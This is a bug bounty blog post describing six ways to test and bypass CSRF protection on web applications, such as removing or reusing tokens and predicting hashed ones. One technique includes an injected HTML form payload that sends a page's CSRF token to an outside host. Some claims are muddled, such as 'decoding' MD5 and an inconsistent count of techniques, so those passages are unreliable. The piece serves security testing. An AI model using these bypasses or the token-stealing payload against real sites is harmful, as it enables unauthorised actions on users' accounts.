6 Methods to bypass CSRF protection on a web application
Hello everyone,
First of all sincere apologies for the immense long delays in article writing and responses. As you know i have been quiet occupied but than again that is no excuse to stay out of touch with me readers. But i would like to announce that i am back in bug bounty hunting and here to write articles for all beginners and pros alike.
You all know what a CSRF is, if you didn’t you would not be on my blog. Today in this article i am going explain four simple tests on testing a website’s CSRF protection which can result in CSRF bypass, which in return can earn you big bucks
- Using a CSRF token across accounts
The simplest and deadliest CSRF bypass is when an application does not validate if the CSRF token is tied to a specific account or not and only validates the algorithm. To validate this
Login to an application from Account A
Go to its password change page
Capture the CSRF token using burp proxy
Logout and Login using Account B
Go to password change page and intercept that request
Replace the CSRF token
2. Replacing value of same length
Another technique is that you find the length of that token, for instance it is an alphanumeric token of 32 characters under the variable authenticity_token you replace the same variable some other 32 character value
For instance the token is ud019eh10923213213123, you replace it with a token of the same value.
3. Removing the CSRF token from requests entirely
This technique normally works on account deleting functions where the token is not verified at all giving the attacker an edge to delete the account of any user via CSRF. But i have found out that it may work on other functionalities as well. It is simple, you intercept the request with burpsuite and remove the token from the entirely, 40% of the applications i have tested were found vulnerable to this technique
4. Decoding CSRF tokens
Another method to bypass CSRF is to identify the algorithm of the CSRF token. In my experience CSRF tokens are either MD5 or Base64 encoded values. You can decode that value and encode the next one in that algorithm and use that token. For instance “a0a080f42e6f13b3a2df133f073095dd” is MD5(122). You can similarly encrypt the next value MD5(123) to for CSRF token bypass.
5. Extracting token via HTML injection
This technique utilizes HTML injection vulnerability using which an attacker can plant a logger to extract the CSRF token from that web page and use that token. An attacker can plant a link such as
<form action=”http://shahmeeramir.com/acquire_token.php”></textarea>
6. Using only the static parts of the token
It is often observed that the CSRF token is composed of two parts. A static part and a dynamic part. Consider two CSRF tokens shahmeer742498h989889 and shahmeer7424ashda099s. Mostly if you use the static part of the token as shahmeer7424 you are able to use that token
There are many other ways to bypass CSRF protection, but i have mostly encountered these in my bug hunting career. If you know any others, please mention in the comments below, also let me know what would you like me to blog about more
